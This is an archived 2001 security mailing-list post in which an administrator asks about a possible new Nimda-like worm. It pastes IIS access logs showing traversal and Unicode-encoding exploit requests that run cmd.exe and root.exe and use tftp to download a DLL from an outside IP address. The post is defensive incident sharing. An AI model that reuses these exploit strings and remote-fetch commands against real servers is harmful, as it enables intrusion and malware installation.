New Worm Variant?

From: Aj Effin Reznor (ajat_private)
Date: Mon Oct 29 2001 - 23:19:32 PST

  • Next message: Kester, Kelly: "RE: New Worm Variant?"

    Anyone seen a new worm doing something like this?
    
    Checking back through my logs, I haven't had a NIMDA instance yet looking
    for httpodbc.dll .  Caught my eye.  Anyone else?  (Yes, some produce a
    code 200 rather than 404, that's to be expected on this system).
    
    Log times are in PST
    
    [29/Oct/2001:17:08:22 -0800] "GET /scripts/root.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438 "-" "-"
    [29/Oct/2001:17:08:35 -0800] "GET /scripts/httpodbc.dll HTTP/1.0" 404 332 "-" "-"
    [29/Oct/2001:17:08:44 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 384 "-" "-"
    [29/Oct/2001:17:08:52 -0800] "GET /MSADC/root.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 436 "-" "-"
    [29/Oct/2001:17:08:53 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330 "-" "-"
    [29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 394 "-" "-"
    [29/Oct/2001:17:09:11 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
    [29/Oct/2001:17:09:21 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
    [29/Oct/2001:17:09:30 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
    [29/Oct/2001:17:09:30 -0800] "GET /c/httpodbc.dll HTTP/1.0" 404 326 "-" "-"
    [29/Oct/2001:17:09:40 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 394 "-" "-"
    [29/Oct/2001:17:09:52 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
    [29/Oct/2001:17:10:01 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
    [29/Oct/2001:17:10:11 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
    [29/Oct/2001:17:10:11 -0800] "GET /d/httpodbc.dll HTTP/1.0" 404 326 "-" "-"
    [29/Oct/2001:17:10:20 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 410 "-" "-"
    [29/Oct/2001:17:10:30 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
    [29/Oct/2001:17:10:38 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
    [29/Oct/2001:17:10:47 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
    [29/Oct/2001:17:10:55 -0800] "GET /scripts/..%255c../httpodbc.dll HTTP/1.0" 200 393 "-" "-"
    [29/Oct/2001:17:11:03 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 431 "-" "-"
    [29/Oct/2001:17:11:12 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
    [29/Oct/2001:17:11:21 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
    [29/Oct/2001:17:11:30 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
    [29/Oct/2001:17:11:39 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0" 200 414 "-" "-"
    [29/Oct/2001:17:11:48 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 431 "-" "-"
    [29/Oct/2001:17:11:57 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
    [29/Oct/2001:17:12:06 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
    [29/Oct/2001:17:12:15 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
    [29/Oct/2001:17:12:24 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0" 200 414 "-" "-"
    [29/Oct/2001:17:12:33 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 459 "-" "-"
    [29/Oct/2001:17:12:43 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 514 "-" "-"
    [29/Oct/2001:17:12:55 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 514 "-" "-"
    [29/Oct/2001:17:13:04 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 514 "-" "-"
    [29/Oct/2001:17:13:13 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../httpodbc.dll HTTP/1.0" 200 442 "-" "-"
    [29/Oct/2001:17:13:24 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
    [29/Oct/2001:17:13:33 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:13:42 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:13:51 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:14:00 -0800] "GET /scripts/..%c1%1c../httpodbc.dll HTTP/1.0" 200 394 "-" "-"
    [29/Oct/2001:17:14:00 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
    [29/Oct/2001:17:14:10 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
    [29/Oct/2001:17:14:19 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:14:28 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:14:37 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:14:45 -0800] "GET /scripts/..%c0%af../httpodbc.dll HTTP/1.0" 200 394 "-" "-"
    [29/Oct/2001:17:14:53 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
    [29/Oct/2001:17:15:07 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:15:19 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:15:28 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:15:37 -0800] "GET /scripts/..%c1%9c../httpodbc.dll HTTP/1.0" 200 394 "-" "-"
    [29/Oct/2001:17:15:37 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
    [29/Oct/2001:17:15:38 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
    [29/Oct/2001:17:15:50 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 414 "-" "-"
    [29/Oct/2001:17:15:59 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 469 "-" "-"
    [29/Oct/2001:17:16:08 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 469 "-" "-"
    [29/Oct/2001:17:16:17 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 469 "-" "-"
    [29/Oct/2001:17:16:26 -0800] "GET /scripts/..%25%35%63../httpodbc.dll HTTP/1.0" 200 397 "-" "-"
    [29/Oct/2001:17:16:37 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 410 "-" "-"
    [29/Oct/2001:17:16:46 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
    [29/Oct/2001:17:16:55 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
    [29/Oct/2001:17:17:04 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
    [29/Oct/2001:17:17:13 -0800] "GET /scripts/..%252f../httpodbc.dll HTTP/1.0" 200 393 "-" "-"
    
    
    
    -aj.
    
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Tue Oct 30 2001 - 06:44:34 PST